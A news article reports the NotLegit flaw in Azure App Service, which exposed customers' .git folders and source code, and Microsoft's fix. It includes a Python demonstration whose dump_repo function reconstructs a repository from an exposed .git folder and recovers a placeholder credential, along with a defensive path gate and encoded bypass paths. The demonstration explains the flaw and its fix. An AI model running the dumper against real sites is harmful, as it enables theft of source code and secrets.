
A flaw in Microsoft Azure App Service exposes customer source code


A vulnerability in the Microsoft Azure App Service led to the exposure of customer source code for at least four years.

Early this month, Microsoft notified a small group of Azure customers impacted by a recently discovered bug, dubbed NotLegit, that had exposed the source code of their Azure web apps since at least September 2017.


The NotLegit vulnerability was likely exploited by threat actors in attacks in the wild.

The flaw was discovered by researchers from the Wiz Research Team, who reported it to Microsoft in September; Microsoft fixed the issue in November. It is insecure default behavior in Azure App Service that exposed the source code of customer applications written in PHP, Python, Ruby, or Node that were deployed using “Local Git”.

The vulnerability resides in Azure App Service, which is a cloud platform for hosting websites and web applications.

Azure supports multiple methods to deploy source code and artifacts to Azure App Service, including “Local Git”. Local Git initializes a Git repository inside the App Service container so that developers can push their code straight to the server. The repository is created in the same directory the web server uses as its content root, which places the .git folder next to the files the site serves.

Only customers who selected the “Local Git” option, deploying their websites from a Git repository hosted on the same Azure server, were impacted; for them the .git folder, and with it the application’s source code, was reachable from the internet.

Every PHP, Node, Ruby, and Python application deployed on Linux-based Azure servers using this method was impacted. Apps hosted on Windows Server systems were not impacted.

“MSRC was informed by Wiz.io, a cloud security vendor, under Coordinated Vulnerability Disclosure (CVD) of an issue where customers can unintentionally configure the .git folder to be created in the content root, which would put them at risk for information disclosure. This, when combined with an application configured to serve static content, makes it possible for others to download files not intended to be public.” reads the advisory published by Microsoft.

Wiz researchers believe the flaw was exploited in the wild. To test this, they deployed a vulnerable Azure App Service app, linked it to an unused domain, and within four days observed the first attempts by threat actors to access the contents of the exposed .git folder. Requests for well-known paths such as /.git/HEAD and /.git/config are a routine probe in automated scanning, so an exposed folder does not stay undiscovered for long.

Microsoft fixed the issue by updating all PHP images to disallow serving the .git folder as static content, as a defense-in-depth measure. The image-level change covers the PHP stack; an application that serves its own static content still has to refuse requests for the .git folder itself, and keeping the repository out of the content root removes the exposure entirely.
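To make the mechanism behind the two preceding paragraphs concrete, here is an added example in Python, written for this article and not code from Wiz or Microsoft. It builds a constructed stand-in for a Local Git deployment whose .git folder sits in the served content root, shows how a client recovers every source file by walking HEAD to the branch ref, to the commit, to the tree and finally to the blobs, without needing directory listing, and then shows the request gate the fix amounts to: any path whose segments include a dot-directory such as .git is refused. The sample repository, the placeholder secret and every name in it are constructed; the Git object format (`"<type> <size>\0<body>"` hashed with SHA-1 and stored zlib-compressed under `.git/objects/xx/yyyy…`) is the real one.

```python
"""NotLegit mechanics: recover source from a web-exposed .git folder, then the
path gate the fix enforces. Constructed example, not Wiz's or Microsoft's code."""
import hashlib, posixpath, re, zlib
from urllib.parse import unquote

def git_object(kind: str, body: bytes) -> tuple[str, bytes]:
    """Return (sha1, zlib-compressed loose object) in Git's on-disk format."""
    raw = f"{kind} {len(body)}\0".encode() + body
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)

def build_exposed_wwwroot() -> dict[str, bytes]:
    """Constructed stand-in for a Local Git deployment: the repository sits in the
    directory the web server uses as content root, so every file under .git is
    also a URL path. Keys are URL paths, values are the bodies a GET returns."""
    site: dict[str, bytes] = {}
    def put(kind: str, body: bytes) -> str:
        sha, obj = git_object(kind, body)
        site[f"/.git/objects/{sha[:2]}/{sha[2:]}"] = obj
        return sha
    cfg = put("blob", b"<?php\n$DB_PASSWORD = 'constructed-example-secret';\n")
    idx = put("blob", b"<?php\nrequire 'config.php';\n")
    tree = b""  # tree entry: "<mode> <name>\0<20-byte sha>", sorted by name
    for name, sha in sorted([("config.php", cfg), ("index.php", idx)]):
        tree += f"100644 {name}\0".encode() + bytes.fromhex(sha)
    commit = put("commit", (f"tree {put('tree', tree)}\nauthor D <d@example.invalid> 0 +0000\n"
                            "committer D <d@example.invalid> 0 +0000\n\ninitial\n").encode())
    site["/.git/HEAD"] = b"ref: refs/heads/master\n"
    site["/.git/refs/heads/master"] = f"{commit}\n".encode()
    return site

def looks_like_git_head(body: bytes) -> bool:
    """Tell a real HEAD file from a catch-all 200 page before walking further."""
    return re.fullmatch(rb"(ref: refs/\S+|[0-9a-f]{40})\s*", body) is not None

def read_object(fetch, sha: str) -> tuple[str, bytes]:
    """Fetch one loose object by hash and strip its 'type size\\0' header."""
    raw = zlib.decompress(fetch(f"/.git/objects/{sha[:2]}/{sha[2:]}"))
    header, body = raw.split(b"\0", 1)
    kind, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError(f"corrupt object {sha}")
    return kind, body

def parse_tree(body: bytes) -> list[tuple[str, str, str]]:
    """Split a raw tree object into (mode, name, sha) triples."""
    entries, i = [], 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].decode().split(" ", 1)
        entries.append((mode, name, body[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries

def dump_repo(fetch) -> dict[str, bytes]:
    """Walk HEAD -> ref -> commit -> tree -> blobs. No directory listing is needed:
    each request path is derived from the previous object's contents."""
    head = fetch("/.git/HEAD")
    if not looks_like_git_head(head):
        raise ValueError("not a Git HEAD file; the folder is probably not exposed")
    head = head.decode().strip()
    commit_sha = fetch("/.git/" + head[5:]).decode().strip() if head.startswith("ref: ") else head
    kind, commit = read_object(fetch, commit_sha)
    if kind != "commit":
        raise ValueError("HEAD does not resolve to a commit")
    files: dict[str, bytes] = {}
    def walk(tree_sha: str, prefix: str) -> None:
        for mode, name, sha in parse_tree(read_object(fetch, tree_sha)[1]):
            path = posixpath.join(prefix, name)
            if mode == "40000":  # subdirectory: recurse
                walk(sha, path)
            else:
                files[path] = read_object(fetch, sha)[1]
    walk(commit.split(b"\n", 1)[0].split(b" ")[1].decode(), "")  # first line: "tree <sha>"
    return files

def is_servable(url_path: str) -> bool:
    """Static-content gate matching the fix described above: decode, normalize,
    then refuse any path whose segments include a dot-directory or dot-file."""
    decoded = unquote(url_path.split("?", 1)[0])
    norm = posixpath.normpath("/" + decoded.lstrip("/"))
    return not any(seg.startswith(".") for seg in norm.split("/") if seg)

def demo() -> tuple[dict[str, bytes], bool]:
    """Return (files recovered from the unprotected root, whether the gate blocked it)."""
    site = build_exposed_wwwroot()
    leaked = dump_repo(site.__getitem__)  # wwwroot served as-is: full source comes back
    def gated(path: str) -> bytes:
        if not is_servable(path):
            raise FileNotFoundError(path)  # what the patched image returns for /.git/*
        return site[path]
    try:
        dump_repo(gated)
        return leaked, False
    except FileNotFoundError:
        return leaked, True
```

The gate decodes percent-encoding and collapses `..` segments before checking, because a filter that only string-matches `/.git/` is bypassed by `/%2egit/HEAD` or `/static/../.git/HEAD`. Running `demo()` against the unprotected root returns both PHP files, including the placeholder credential; the same walk against the gated root fails on the very first request.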

The IT giant granted Wiz a $7,500 bounty for reporting this flaw, and the security firm has announced that it plans to donate the reward.


Pierluigi Paganini

(SecurityAffairs – hacking, azure app service)
